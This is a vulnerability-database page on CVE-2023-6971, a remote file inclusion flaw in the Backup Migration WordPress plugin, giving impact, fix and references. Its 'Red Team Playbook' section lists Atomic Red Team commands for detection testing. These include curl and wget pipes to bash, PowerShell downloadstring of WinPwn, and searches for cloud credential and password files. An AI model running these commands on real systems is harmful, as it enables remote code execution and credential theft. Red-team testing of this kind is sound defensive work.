CVE-2023-6971
Overview
This vulnerability is a Remote File Inclusion (RFI) flaw in the Backup Migration plugin for WordPress. It arises from improper validation of the 'content-dir' HTTP header, allowing external URLs to be included and executed by the server. The affected component is the Backup Migration plugin versions 1.0.8 through 1.3.9, which relies on PHP configurations that permit URL-based file inclusion.
Vulnerability Description
The Backup Migration plugin for WordPress is vulnerable to Remote File Inclusion in versions 1.0.8 to 1.3.9 via the 'content-dir' HTTP header. This makes it possible for unauthenticated attackers to include remote files on the server, resulting in code execution. NOTE: Successful exploitation of this vulnerability requires that the target server's php.ini is configured with 'allow_url_include' set to 'on'. This feature is deprecated as of PHP 7.4 and is disabled by default, but can still be explicitly enabled in later versions of PHP.
Impact
An unauthenticated attacker can exploit this flaw to execute arbitrary code remotely on the server hosting the vulnerable Backup Migration plugin. This can lead to full system compromise, data theft, or service disruption. Exploitation requires network access and the server's PHP configuration to have 'allow_url_include' enabled, which is disabled by default but can be explicitly set. The CVSS vector (AV:N/AC:H/PR:N/UI:N) indicates no privileges or user interaction are needed, but high attack complexity due to configuration dependencies.
Solution
Users should upgrade the Backup Migration plugin to a version later than 1.3.9 where this vulnerability is addressed. Refer to the WordFence advisory (https://www.wordfence.com/threat-intel/vulnerabilities/id/b380283c-0dbb-4d67-9f66-cb7c400c0427) for detailed patch information. Additionally, ensure the PHP configuration disables 'allow_url_include' to mitigate exploitation risk. Monitoring plugin updates and applying vendor patches promptly is recommended.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The Backup Migration plugin for WordPress is susceptible to a critical vulnerability that allows for Remote File Inclusion (RFI) through manipulation of the 'content-dir' HTTP header. This flaw exists in versions 1.0.8 to 1.3.9 of the plugin, enabling unauthenticated attackers to include and execute remote files on the server. The exploitation of this vulnerability hinges on the configuration of the server's php.ini file, specifically the 'allow_url_include' directive, which must be set to 'on'. While this feature is deprecated in PHP 7.4 and later versions, it remains a potential risk if explicitly enabled, creating a significant attack vector for malicious actors.
Attackers can exploit this vulnerability by crafting a specially designed HTTP request that includes a malicious URL in the 'content-dir' header. If the server is misconfigured to allow remote file inclusion, the attacker can execute arbitrary PHP code, potentially leading to full server compromise. This scenario could unfold in various ways, such as uploading web shells, stealing sensitive data, or even pivoting to other systems within the network. Given that the vulnerability allows for unauthenticated access, it significantly lowers the barrier for exploitation, making it a prime target for attackers seeking to compromise WordPress installations.
The real-world impact of this vulnerability is profound, particularly for organizations relying on the affected plugin for backup and migration tasks. Successful exploitation can lead to unauthorized access to sensitive information, defacement of websites, or the installation of malware. The business risks associated with such incidents include reputational damage, loss of customer trust, and potential legal ramifications due to data breaches. Furthermore, the financial implications can be severe, encompassing costs related to incident response, recovery efforts, and potential regulatory fines. The ease of exploitation and the critical nature of the vulnerability necessitate immediate attention from organizations using the affected plugin.
To detect and mitigate this vulnerability, organizations should first assess their current WordPress installations for the presence of the Backup Migration plugin and its version. If the vulnerable versions are identified, immediate steps should be taken to update to a patched version or remove the plugin entirely if it is not essential. Additionally, server configurations should be reviewed to ensure that 'allow_url_include' is disabled, thereby reducing the risk of remote file inclusion. Implementing a web application firewall (WAF) can also help to filter out malicious requests targeting this vulnerability. Regular security audits and vulnerability assessments are crucial in maintaining a secure environment and ensuring that similar vulnerabilities are identified and remediated promptly.
In conclusion, the vulnerability present in the Backup Migration plugin for WordPress represents a significant threat to web applications, particularly due to its ease of exploitation and the potential for severe consequences. Organizations must prioritize the identification and remediation of such vulnerabilities to safeguard their digital assets and maintain the integrity of their operations. By adopting proactive security measures and fostering a culture of cybersecurity awareness, businesses can mitigate the risks associated with this and other vulnerabilities in the ever-evolving threat landscape.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Backupbliss | Backup Migration | All |
cpe:2.3:a:backupbliss:backup_migration:*:*:*:*:*:wordpress:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-6971 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/b380283c-0dbb-4d67-9f66-cb7c400c0427?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/backup-backup/tags/1.3.9/includes/backup-heart.php |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset/3012745/backup-backup |